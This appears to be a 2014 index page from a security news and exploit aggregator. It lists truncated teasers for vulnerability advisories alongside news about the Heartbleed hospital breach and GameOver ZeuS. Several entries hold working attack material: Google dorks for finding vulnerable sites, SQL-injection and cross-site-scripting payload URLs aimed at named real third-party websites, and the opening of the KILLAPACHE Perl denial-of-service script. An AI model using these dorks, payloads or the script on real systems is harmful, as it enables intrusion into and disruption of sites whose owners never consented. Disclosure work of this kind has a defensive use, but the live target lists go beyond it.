ArticleFR 3.0.4 SQL Injection

20 August 2014 - Source: http://www.mondounix.com
Advisory ID: HTB23225
Product: ArticleFR
Vendor: Free Reprintables
Vulnerable Version(s): 3.0.4 and probably prior
Tested Version: 3.0.4
Advisory Publication: July 23, 2014 [without technical details]
Vendor Notification: July 23, 2014 
Public Disclosure: August 20, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-5097
Risk Level: High 
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered...

Read more »

WordPress All In One SEO Pack 2.2.2 Cross Site Scripting

20 August 2014 - Source: http://www.mondounix.com
Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2
 
ABOUT:
 
All in One SEO Pack is a WordPress SEO plugin to automatically optimize your WordPress blog for Search Engines such as Google. Version 2.2.2 suffers from a cross site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. 
 
NOTE: User must have the ability to publish pages in the affected WordPress site.
 
POC:
 
http://localhost/wordpress/wp-admin/post.php?post_type=page
 
Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0)...

Read more »

US hospital hack ‘exploited Heartbleed flaw’

20 August 2014 - Source: http://www.mondounix.com


The theft of personal data belonging to about 4.5 million healthcare patients earlier this year was made possible because of the Heartbleed bug, according to a leading security expert.

Community Health Systems - the US's second largest profit-making hospital chain - announced on Monday that its systems had been breached.

The head of TrustedSec - a cybersecurity firm - now alleges that the encryption flaw was exploited.

CHS has yet to respond to the claim.

The Heartbleed bug made headlines in April when Google and Codenomicon - a Finnish security company - revealed a problem with OpenSSL, a cryptographic library used to digitally scramble sensitive data.

OpenSSL...

Read more »

LY Website CMS SQL Injection

18 August 2014 - Source: http://www.mondounix.com
[+] Title: LY Website CMS Sql Injection vulnerability
[+] Date: 2014-08-15
[+] Author: Iran Security Group
[+] Vendor Homepage: http://www.lywebsite.com/
[+] Tested on: Windows7 & Kali Linux
[+] Vulnerable Files: /pro.php
[+] Dork : inurl:/pro.php?CateId=
           intext:"Power By LY Website"
### POC: http://site/pro.php?CateId=[sqli]
### Demo: http://www.bypipefittings.com/pro.php?CateId=20%27
          http://www.top1rc.com/pro.php?CateId=150%27
### Credits:
[+] Special Thanks: Root SmasheR, Hekt0r, Mr.Moein,Umpire, ALIREZA_PROMIS
                    Social Engineer, Ali Ahmady, Saeed.Jok3r,M4hdi
                    Vahid Hacker, BlackErroR, Phantom.S3c
                    And All members of Iran Security Group
[+]...

Read more »

WordPress 2.77 CSRF

17 August 2014 - Source: http://www.mondounix.com
Disqus for Wordpress
https://wordpress.org/plugins/disqus-comment-system
Version affected: up to v2.77
 
CSRF allows for activation and deactivation of the plugin and syncing comments between Disqus servers and the WP database.
They supposedly just fixed the CSRF issues. Ugh. Sorry Nik. Even when you tell them about nonces they still don't get it right.
 
More details can be found here:
https://vexatioustendencies.com/csrf-in-disqus-wordpress-plugin-v2-77/


...

Read more »

KILLAPACHE Apache httpd Remote Denial of Service

17 August 2014 - Source: http://www.mondounix.com
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
 
use IO::Socket;
use Parallel::ForkManager;
 
    sub usage {
            print "Apache Remote Denial of Service (memory exhaustion)\n";
            print "by Kingcope\n";
            print "usage: perl killapache.pl <host> [numforks]\n";
            print "example: perl killapache.pl www.example.com 50\n";
    }
 
    sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";
 
    $pm = new...

Read more »

GameOver ZeuS zombie MUTATES, shuffles back to its feet

16 August 2014 - Source: http://www.mondounix.com


The resurfaced GameOver bot is back with a vengeance, having infected 12,000 computers after the network was taken down in June, according to Arbor Networks.

The bot was taken out in June in a coordinated and high-profile crackdown by security companies and the FBI and Europol. Servers and domains were seized, disrupting both GameOver Zeus and the CryptoLocker distribution network – although it later staggered back from the dead.

Researchers Dave Loftus and Dennis Schwarz found the bot, now reborn as newGOZ, had ramped up its defences, dumping command and control for a more robust domain generation algorithm (DGA) and a fast flux DNS technique.

The DGA registered new domains...

Read more »

WordPress MyBand Theme Cross Site Scripting

15 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: WordPress MyBand Theme Cross Site Scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-03
  |
  | [*] Vendor Homepage : http://www.mybandtheme.com
  |
  | [*] Google Dork: inurl:wp-content/themes/myband
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind: XSS Reflected
  |
  | [*] PoC :
  |
  | [*]  [Localhost]/wordpress/wp-content/themes/myband/timthumb.php?src=[XSS]
  |-------------------------------------------------------------------------|
...

Read more »

WordPress Gamespeed Theme Cross Site Scripting

15 August 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : WordPress Gamespeed Theme Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.dalih.net/
# Date: 3/8/2014
# Tested On : Linux , Windows
# Software Link : http://www.dalih.net/wordpress-themes/game-speed/
######################
#  
http://www.centrecatala.cl/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%22%3E%3Cimg%20src=aa%20onerror=prompt%28/xss/%29%3E
#  
http://radiohope.com.ar/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://www.gameactors.com/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
#  
http://300mbfilms.ir/wp-content/themes/gamespeed/includes/timthumb.php?h=80&src=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
######################
#...

Read more »

WordPress SI CAPTCHA Cross Site Scripting

15 August 2014 - Source: http://www.mondounix.com
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
  |-------------------------------------------------------------------------|
  | [*] Exploit Title: WordPress SI CAPTCHA Anti-Spam Plugin Cross Site Scripting
  |
  | [*] Exploit Author: Ashiyane Digital Security Team
  |
  | [*] Date : 2014-08-02
  |
  | [*] Vendor Homepage : http://wordpress.org
  |
  | [*] Software Link : http://wordpress.org/plugins/si-captcha-for-wordpress/
  |
  | [*] Version : 2.7.4
  |
  | [*] Google Dork: inurl:/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage
  |
  | [*] Tested on: Windows , Mozilla Firefox
  |-------------------------------------------------------------------------|
  | [*] Kind:...

Read more »